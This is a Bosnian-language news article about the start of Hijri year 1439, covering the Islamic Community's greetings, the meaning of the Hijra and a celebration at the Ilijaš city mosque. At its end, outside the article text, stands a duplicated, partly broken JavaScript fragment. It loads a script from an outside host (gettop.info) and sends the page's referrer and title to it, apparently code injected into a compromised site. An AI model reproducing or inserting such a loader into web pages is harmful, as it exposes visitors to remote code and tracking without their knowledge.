Sa akšam namazom nastupa Hidžretska 1439. godina

Po Takvimu Rijaseta Islamske zajednice (IZ) u Bosni i Hercegovini 20. septembra s akšam namazom nastupa nova 1439. hidžretska godina, a prvi dan te nove godine je 21. septembra, to jeste 1. Muharrema 1439. hidžretske godine.

“Povodom nastupajuće Nove hidžretske godine, Rijaset IZ u BiH svim muslimanima u domovini i dijaspori upućuje iskrene čestitke uz molbu Uzvišenom Gospodaru da ih obraduje Svojim Oprostom, Milošću i Uputom. Sene-i džedide mubarek olsun”, stoji u saopćenju koje prenosi MINA.

Hidžra znači seoba Muhammeda a.s. i njegovih prijatelja, ashaba, iz Meke u Medinu 622. godine i predstavlja veličanstven događaj u muslimanskoj historiji koji im je omogućio da postanu organizirana i odgovorna zajednica, sposobna da vrijednosti islama pretoči u društveni život.

“Hidžra je bila iznimno težak, bolan i rizičan poduhvat jer je od male vjerske grupe predvođene Poslanikom Muhamedom a.s. zatraženo da napuste svoje domove i prihvate pomoć i zaštitu stanovnika Medine. Zbog te velike žrtve Kur’an svim muhadžirima i ensarijama garantira džennetske nagrade. Praksom bratimljenja između muhadžira i ensarija Muhammed a.s. je demonstrirao islamski ideal univerzalnog bratstva na principima vjerovanja u jednog Boga (tevhid)”, pojašnjava se u saopćenju.

Tim povodom u Gradskoj džamiji Ilijaš u četvrtak poslije akšam namaza bit će održana centralna mevludska svečanost u organizaciji Islamske zajednice BiH, džemata Ilijaša i Mreže mladih.

Pored donošenja salavata i učenja mevluda i ilahija u izvedbi ilijaških imama i Hora “Preporod”  Ilijaš programom je najavljeno i obraćanje glavnog imama MIZ Sarajevo dr Ferida ef.Dautovića.

Članovi Mreže mladih dijelit će prisutnima halvu, a nakon jacije namaza najavljen je i vatromet.  

Nova godina čestita se riječima:  KULLU ‘AMIN VE ENTUM BIHAJR-NEKA VAM JE CIJELA GODINA SRETNA I BERIĆETNA.

S obzirom na veličinu i značaj Hidžre, na prijedlog drugog pravednog halife Omera r.a., računanje vremena u islamskom kalendaru određuje se upravo po ovom događaju.
U svim džamijama i mesdžidima Islamske zajednice u BiH i dijaspori Nova hidžretska godina se obilježava na primjeran tradicionalan način.

 s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;